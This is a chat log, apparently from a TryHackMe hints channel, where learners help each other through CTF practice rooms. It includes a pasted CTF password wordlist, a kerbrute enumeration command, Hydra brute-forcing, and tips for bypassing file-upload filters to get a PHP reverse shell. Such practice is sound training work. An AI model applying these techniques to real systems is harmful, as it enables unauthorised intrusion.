"Ot9RrG7h2~24?\nEh, you've earned this. Username for FTP is ftpuser\nOne of these is the password:\nMou+56n%QK8sr\n1618B0AUshw1M\nA56IpIl%1s02u\nvTFbDzX9&Nmu?\nFfF~sfu^UQZmT\n8FF?iKO27b~V0\nua4W~2-@y7dE$\n3j39aMQQ7xFXT\nWb4--CTc4ww*-\nu6oY9?nHv84D&\n0iBp4W69Gr_Yf\nTS*%miyPsGV54\nC77O3FIy0c0sd\nO14xEhgg0Hxz1\n5dpv#Pr$wqH7F\n1G8Ucoce1+gS5\n0plnI%f0~Jw71\n0kLoLzfhqq8u&\nkS9pn5yiFGj6d\nzeff4#!b5Ib_n\nrNT4E4SHDGBkl\nKKH5zy23+S0@B\n3r6PHtM4NzJjE\ngm0!!EC1A0I2?\nHPHr!j00RaDEi\n7N+J9BYSp4uaY\nPYKt-ebvtmWoC\n3TN%cD_E6zm*s\neo?@c!ly3&=0Z\nnR8&FXz$ZPelN\neE4Mu53UkKHx#\n86?004F9!o49d\nSNGY0JjA5@0EE\ntrm64++JZ7R6E\n3zJuGL~8KmiK^\nCR-ItthsH%9du\nyP9kft386bB8G\nA-*eE3L@!4W5o\nGoM^$82l&GA5D\n1t$4$g$I+V_BH\n0XxpTd90Vt8OL\nj0CN?Z#8Bp69_\nG#h~9@5E5QA5l\nDRWNM7auXF7@j\nFw!if_=kk7Oqz\n92d5r$uyw!vaE\nc-AA7a2u!W2*?\nzy8z3kBi#2e36\nJ5%2Hn+7I6QLt\ngL$2fmgnq8vI*\nEtb?i?Kj4R=QM\n7CabD7kwY7=ri\n4uaIRX~-cY6K4\nkY1oxscv4EB2d\nk32?3^x1ex7#o\nep4IPQ_=ku@V8\ntQxFJ909rd1y2\n5L6kpPR5E2Msn\n65NX66Wv~oFP2\nLRAQ@zcBphn!1\nV4bt3*58Z32Xe\nki^t!+uqB?DyI\n5iez1wGXKfPKQ\nnJ90XzX&AnF5v\n7EiMd5!r%=18c\nwYyx6Eq-T^9\#@\nyT2o$2exo~UdW\nZuI-8!JyI6iRS\nPTKM6RsLWZ1&^\n3O$oC~%XUlRO@\nKW3fjzWpUGHSW\nnTzl5f=9eS&*W\nWS9x0ZF=x1%8z\nSr4*E4NT5fOhS\nhLR3xQV*gHYuC\n4P3QgF5kflszS\nNIZ2D%d58*v@R\n0rJ7p%6Axm05K\n94rU30Zx45z5c\nVi^Qf+u%0*q_S\n1Fvdp&bNl3#&l\nzLH%Ot0Bw&c%9\n" Is this some kind of encoding?

What room is this?

Year of the Rabbit.

oh my lord

Oh ok I forgot how I did that

@oblique cliff Thanks a lot! Looked almost everywhere except media xD

No worries Blackout.

uh i legitamtely dont remember encountering that

Yea me neither

I extracted the data from png using zsteg.

that came out in a really weird format

IIRC there's a link or file and you have to listen to it to help you

it shouldnt be like that

IIRC there's a link or file and you have to listen to it to help you
@astral smelt he passed that already

try something a bit simpler to get info from a file @wintry yarrow

Oh ok yea that room took me a while because of the rabbit holes that's probably why I forgot about it

I tried strings now and got the username.

Password is gibberish though.

You have to extract the image but not with zsteg

I remember now

Oh.

Have you got the name of the picture

||ftpuser|| is the username right?

yea

Yup.

Is that picture password?

*name

so have you done ||sed||

on the image

Nope. Let me try that.

I've never used sed before.

I tried strings now and got the username.
@wintry yarrow what do you get when you do this on the picture?

that should give you everything you need

yea that gives you the list of possible passwords

also spoiler please

those are all possible passwords

do a little brute force action

Oh no I didn't one of these is password.

Sorry about that.

Not a problem

#blobgang

When you cat or use strings on the file there are some that are the same but on two lines there is a potential password for the user you have to use ||sed|| with them two lines

||Got the password with Hydra.|| I don't know how to use sed, I'll look into that, thanks.

oh ok you're there

Ok so you're a bit ahead

Did you login with ftp?

Yup, just got logged in.

there is a file with creds did you get them?

Yup, I got them. I'm pretty confident I can get root now. Thank you for your help.

im confident in you as well

you have the collective knowledge of #blobgang behind you 😤

I am stuck in this question anyone who can help me a little bit

https://tryhackme.com/room/owaspjuiceshop

i perform the same steps but its not working

@trim haven I hope its ok to ping you

I managed to get the the file onto my local machine , disassembled it and tried to do a bof

but failed

I mean have you tried just doing nano file.name

hello there , i am stuck at kenobi room where i couldn't mount the files of kenobi home directory
using this command : mount ip_address:/var /mnt/kenobiNFS reply with this error :
mount: /mnt/kenboiNFS , bad option

Without marking it an executable

even i have used mount.nfs and it doesn't work too

I did cat file > another file ; chmod 777 anotherfile

it runs exactly like it is supposed to

If you download the file

You can manipulate the file

indeed

why should I ?

Well if you can manipulate it

You can read the code

If you can read the code

You can understand how it works

wait what ?

@solar lintel mount -t nfs iirc

smth like this is possible ?

James could you assist with this? The room is Wonderland and this user is stuck on the teaParty executable. I’m trying to explain it without giving it away completely but I’m struggling to get my point across.

You can reverse engineer stuff yes

You need to understand what the program foes before you can exploit it

Copy it off, throw it into R2 or Ghidra or R2dec or something

what about gdb ?

If you want. But decompiling it and getting C is going to be better for you.

ohh ok

so decompile instead of trying to understand the asm ?

Gonna be easier

ight thanks

@solar lintel mount -t nfs iirc
@stuck fractal i tried it although it doesn't work too

Show the full command please

mount -t nfs ip_address:/var /mnt/kenobiNFS

just so I can use the right tool right away: should I use Ghidra or R2

not just for the challenge but in general

That's a question only you can answer

Learn which one you like better

Use that one

ok

@humble cliff burpsuite

how compile Printspoofer.exe

You need visual studio. I'd recommend getting a pre-compiled version

Mayor's github have complied one.

0day is also giving out 32 bit versions if you want that

I found that this command: ||find / -xdev -type f -print0 2>/dev/null | xargs -0 grep -E '^[a-z0-9]{32}$' 2>/dev/null|| solves flag26 from Linux Challenges. However, I can't understand what it is doing exactly. Can anyone explain me the reasoning behind this?

https://explainshell.com/

in the Attacktive Directory room how long is it going to take to enumerate valid usernames? with kerbrute

been on it more then 20min now

no valid usernames yet

like 15 seconds

did you use the wordlist they provided

yes

show pic of the syntax you used

kkk

||./kerbrute_linux_amd64 userenum --dc spookysec.local -d spookysec.local Userlist.txt -t 100||

that should finish in like 30 seconds regardless of if it finds anything

can you communicate with the machine?

yes

I think technically the DC name is wrong here

oh, yea it is

really what i missing

--DC??

did you enumerate with enum4linux?

it should tell you the DC name

spookysec.local is the domain name

Not the DC name

||THM-AD

||it should tell you the DC name
@oblique cliff

oh that is domain name

my bad

not bad 🤷‍♂️

not bad 🤷‍♂️
@oblique cliff really lol

look at the enum4linux output again. The DC name will be there. You had the format right before, just wrong name

I know that is a recent room but can I have any hints in how to PE the room "Jacob the Boss"? I feel that i have tried everything...

look at the enum4linux output again. The DC name will be there. You had the format right before, just wrong name
@oblique cliff sure thanks man

Your comment has confused me

I'm not sure if it was a grammatical error or if that is how you meant it.

that is how i meant it aha

well, uh

but I do believe it belongs in feedback :p

yeah sure aha

oh my, i didnt saw it was #roomhints , i thought i was talkin in General

why are you a slightly disappointed potato? 😦

lets try to make you a satisfied and happy potato!

or, better yet, a tomato!

I can make a list on why i am a slightly dissapointed potato

if that will help you feel better then sure 😦

Hey there please help me out here, I am struggling with the find command

zthlinux task 33

We've been through a lot in this section, and the challenge for this binary will reflect that. The first step is actually finding the binary, I'm not heartless though, so I'll give you the name of the binary. The name of the binary is shiba4.

according to me the command should be find / shiba4, but that finds everything, please help

man find

lol

Thanks

Hey guys 🙂 , I'm on the OWASP Zap room and I'm stuck on one question ( my last one) " What does ZAP stand for?" Even if the question is really clear , I don't understand what kind of answer the room expect

after 5 try, I still don't get it ^^

I mean

What are you not understanding?

me ?

Mhm

have you tried google?

I want to help you understand, Dragonar

How can I find the RHOSTS for https://tryhackme.com/room/blue

@sullen raptor deploy the machine, it should be in the “machine IP” header

RHOST is the ip of the machine being attacked

oh my b

I understood that Zap is like Burp suit , I understood that those soft are a security testing framework and we can use those to test web applications

what I don't understand is what is the exact answer the room expect ^^

Are you aware of what an abbreviation is?

or maybe I don't get something 😒

Are you aware of what an abbreviation is?
@trim haven

@trim haven thanks ! goti t !

:)

and my bad , I read the question too fast and was sure that I understood the question but not xD

anyway thanks for the help 🙂

sometime , we just need a "programmer duck " :p

very confused where the user flag is in the RootMe machine, ive literally looked at every directory

also doing locate user.txt returns nothin

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

Specifically the last part

Sorry :/

so i wont get hints

K

Not for around 3-4 days

ait

didnt kno

first time doin a new machine

It's fine honestly

I’m glad i’m not the only one getting trolled by that flag lol

oh so i might not be stoopid well thats enough

lol

Delete that please

me?

Yes

which one

We don't use that word here :/

O

https://tenor.com/view/mike-wazowski-watchingyou-gif-5352035

i got the root flag before user

ok

Lmao nice!

i finally found the user i hate the box creator

Can I possibly get a clue/hint for Task 43 in the "Learn Linux" room I need to get a flag from a file in the root users directory, my user has no sudo permissions, so am I bit stumped as to how to do that. It's probably something really easy that I haven't thought of embarassingly.

Edit: nvm just seen there is writeups, and it's what I suspected.

can someone maybe give me a clue [Task 8] Bypassing Server-Side Filtering: File Extensions . able to upload files just they are not getting executed for the reverse shell

Which room?

know directory stored in

oh sorry Upload Vulnerabilities

Is this the challenge task?

no

annex.uploadvulns.thm

Does it load for a few seconds or just instantly load?

it wants a png which can be displayed so renamed shell shell.png

then traverse to directory says file cannot be displayed

Probably isn't being treated as a PHP file then

yes

Might have to try something different

tried .pngphp

I see your issue

You need to use valid php extensions

also tried .png%2500php

okay

Are these valid php extensions? They seem completely wild to me

had to bypass the filter whichdoes like php maybe try phtml next

In the room c4ptur3th3fl4g I'm trying to figure out what cipher type #7 is, any points in the right direction

Task 1 #7?

Yea task1 #7 sorry

I don’t actually remember so it’s not a spoiler but that looks like it’s been shifted in the ascii table

Bigger hint: ||looks like it’s been ROTated||

I could be wrong FYI that’s just what it looks like

It was, but how could you tell?

The length of each set of characters looks like it doesn’t change the word size. So it’s probably a 1-to-1 match for the cipher. And then the weird characters and special symbols are usually indicative of ROT13 or 47 (whatever the other one is)

Cuz you usually don’t get special characters doing other transformations

Can someone assist me with the Network Service room task 7 #5

Trying to start the tcpdump but keep receiving an error message

It would be helpful to see the error message as well as the command you’re running in a screenshot @iron swallow

Was in the process of uploading

you’re not connected to the vpn

I am using the “my machine” that THM provide

then use eth0 instead of tun0

all you’re doing is specifying which adaptor to use

for http-auth in hydra does it work with http-get or http-post-form?

post I believe.

in upload vulns room on ||magic numbers section, i was able to upload the file but could not get it to work. have tried many different extensions like phtml, php5, phar etc.|| can someone point me in the right directions?

I don’t think you need to use different file extensions

Just use a .php and change the magic bytes

i did, but the file is interpreted as text and i get the code for the php shell

Have you changed the header

what do you mean? as you can see i've added the ||GIF bytes|| in the beginning

Upload and intercept the request then screenshot burp please

will do one sec

Content type

Change it to text/x-php that might fix it

oh yeah! hold on lemme try that

just forwarded that request with different content type

Try again?? I’m not sure but I think that’s how I did it and it worked

tried a bunch

i also removed and put the boundary parameter

@inland onyx May I borrow your knowledge for a second?

haha he's offline

i tried application/x-php as well

Well there it fails

See how it says submit=failure

That wouldn’t work simply because it’s already the wrong file

thats just the page i was on before

Do you mind waiting 5 minutes for me to get out of bed and turn on my computer aha

hahaha dont worry about it, i dont want it to become a hassle

Nono I wanna help you solve this :p

thanks

@white salmon Which signature are you using?

what do you mean? @trim haven

Do you mind if I DM you?

i dont mind at all

Awesome

everyone is allowed to DM me haha

👀

@trim haven what's up?

There's an issue with your upload vulns room

I think it may have just been the way Alchemist changed the hex bytes but I'm working it out :p

Sorry for the ping Muir

What's the issue?

They did everything correct but the file was just outputting as text on the website

Which website?

magic bytes http://magic.uploadvulns.thm

Hm, that's interesting. I would suspect it's a difference in how the shell was updated. That one should work exactly as it is in the tutorial section.

Just a straight php server

Yeah, I've sent them my working file to see if it works. I was really confused hence the ping.

Fair

Yes, my file worked.

Well, I'm off to see a Crannog, but lemme know how it goes

Possibly just an issue with the bytes

Or that 😁

Yep

Thank you anyway <3

Np

are we allowed to ask for hints on jacob yet

@inland onyx it was an issue with the GIF bytes but now i ran into another issue with jewel...||burpsuite does not give me the response to the request...when it does, i can access the JS file in order to stop client side filtering|| i was actually able to upload the JS file but ||i had to put magic bytes at the beginning of the shell, and when i tried to execute it it wouldn't work because that messed up the script||

are we allowed to ask for hints on jacob yet
@green sorrel oh and i dont think so since its pretty new, wait a few days

@white salmon pretty sure I added a hint saying specifically not to do that

Node webservers don't react quite the same way as a PHP backed server would

@inland onyx oh? well, how would i go about editing the JS file containing the restrictions?

I would suggest capturing it in Burpsuite and removing the filters. I was nice and left them de-obfuscated to make it easier

thats what i did, i removed the filters as well. thing is, when i reload the site in order to capture the initial request, i ask it to intercept the response as well. when i forward that script i get a 304

Remind me to add in a hint about that

Research what 304 means @white salmon, then see what you can do to stop it from happening.

oh so its supposed to be there @inland onyx ? i thought the room was borked

@white salmon Strictly speaking it's not actually anything to do with the room. 304 means that the resource hasn't been changed since the last time you requested it -- i.e. an up to date version is stored in your browser's cache already. To save resource usage, your computer just reuses the version it has stored, rather than requesting a new copy.

oh so thats why im not getting the html.. thanks muir!

hi so i'm doing MR robot i downloaded the file that i blv contains the second flag, i made a python program that prints line with 32 length but there are too many what should i do ?

check if there are duplicates in the file

also that file doesnt have the second flag

oh XD

I checked for duplicates and doesn't print anything but thank imma do some more diging

pls hint for rootme its not working 😭

Can i get a nudge for jacobtheboss privesc to root
cant even change directory
or get a rev shell

upload this is not working i tried so many ways for php thing

im losing my mind on it liturally

@white salmon can i help you?

yes

how

Ellllf

New room

!rule 13